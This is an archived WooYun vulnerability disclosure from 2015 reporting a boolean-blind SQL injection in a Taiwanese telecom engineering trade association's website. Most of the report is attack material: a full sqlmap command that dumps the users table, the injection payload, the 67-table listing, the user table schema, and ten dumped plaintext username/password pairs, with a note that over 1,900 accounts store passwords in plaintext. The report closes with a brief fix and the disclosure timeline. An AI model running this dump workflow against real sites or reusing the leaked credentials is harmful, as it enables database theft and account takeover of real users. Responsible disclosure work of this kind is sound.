乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经确认,细节仅向厂商公开 2015-10-23: 细节向核心白帽子及相关领域专家公开 2015-11-02: 细节向普通白帽子公开 2015-11-12: 细节向实习白帽子公开 2015-11-27: 细节向公众公开
台湾区电信工程工业同业公会某处存在sql注入漏洞(布尔盲注/67个表/大量用户明文密码泄露可登录)
使用sqlmap进行测试,测试地址:http://**.**.**.**/products/index.php?users_id=1248
python sqlmap.py =u "http://**.**.**.**/products/index.php?users_id=1248" -p users_id --technique=B --random-agent --threads=10 -D tteiaorgtw -T org_users -C username,password --dump
---Parameter: users_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: users_id=1248 AND 2122=2122---web server operating system: Linux CentOSweb application technology: Apache 2.2.27, PHP 5.2.17back-end DBMS: MySQL 5available databases [4]:[*] information_schema[*] test[*] test_db[*] tteiaorgtw
back-end DBMS: MySQL 5Database: tteiaorgtw[67 tables]+----------------------------------+| ip2nation || ip2nationcountries || org_ || org_action || org_action_2 || org_ad || org_ad_type || org_calender || org_contact_us || org_course || org_course_type || org_download || org_download_folder || org_download_type || org_epaper || org_epaper_log || org_epaper_queue || org_epaper_result || org_epaper_smtp || org_epaper_subscriber || org_epaper_subscriber_type || org_epapers || org_epapers_log || org_epapers_subscriber || org_epapers_subscriber_type || org_epapers_type || org_film || org_film_type || org_forum || org_forum_type || org_gallery || org_gallery_album || org_gallery_type || org_key_cloud || org_link || org_news || org_news_type || org_payment || org_products || org_products_cate || org_products_link || org_products_spec || org_products_type || org_questionary || org_questionary_answer || org_questionary_available || org_questionary_subject || org_questionary_type || org_searchbot || org_shipment || org_site_map || org_statistics_agent || org_statistics_functions || org_statistics_login || org_statistics_visitors || org_statistics_visitors_20101028 || org_system_setting || org_themes || org_trade || org_trade_detail || org_users || org_users_bak120525 || org_users_bk || org_users_cate || org_users_type || org_web_content || users_ub |+----------------------------------+
Database: tteiaorgtwTable: org_users[41 columns]+------------------------+-------------------+| Column | Type |+------------------------+-------------------+| address | varchar(255) || address_reg | varchar(255) || area | varchar(255) || auth || birthday | varchar(10) || career | varchar(255) || cate_id | int(10) || company_name | varchar(255) || company_no | varchar(255) || contact | varchar(255) || contact_address | varchar(255) || contact_person | varchar(255) || content | text || date_end | varchar(10) || date_start | varchar(10) || educational_background | varchar(255) || email | varchar(255) || epaper_subscriber | enum('0','1') || excellent | varchar(255) || fax | v || id | int(10) || lat | varchar(255) || license | varchar(255) || lng | varchar(255) || mobile | va || name | varchar(100) || note | text || password | varchar(100) || professional_title | varchar(255) || profile | text || sex | enum('0','1') || status | enum('0','1','2') || tel_1 | varchar(50) || tel_2 | varchar(50) || time_create | varchar(19) || time_modify | varchar(19) || type_id | int(10) || url | varchar(255) || username | varchar(100) || xid | varchar(255) || zip | varchar(10) |+------------------------+-------------------+
back-end DBMS: MySQL 5Database: tteiaorgtw+-----------+---------+| Table | Entries |+-----------+---------+| org_users | 1930 |+-----------+---------+
由于速度比较慢,这里只挑选10个数据dump。
Database: tteiaorgtwTable: org_users[10 entries]+----------+----------+| username | password |+----------+----------+| 60105 | 000 || 50157 | 001 || 30105 | 001 || 50023 | 001 || 3 | 001 || 60369 | 002 || 1 | 003 || 10207 | 003 || 3 | 003 || 60153 | 005 |+----------+----------+
有1000多名名用户,均用明文存储密码,这里只挑选一个登陆证明。
增加过滤。
危害等级:高
漏洞Rank:15
确认时间:2015-10-13 14:33
感謝通報
暂无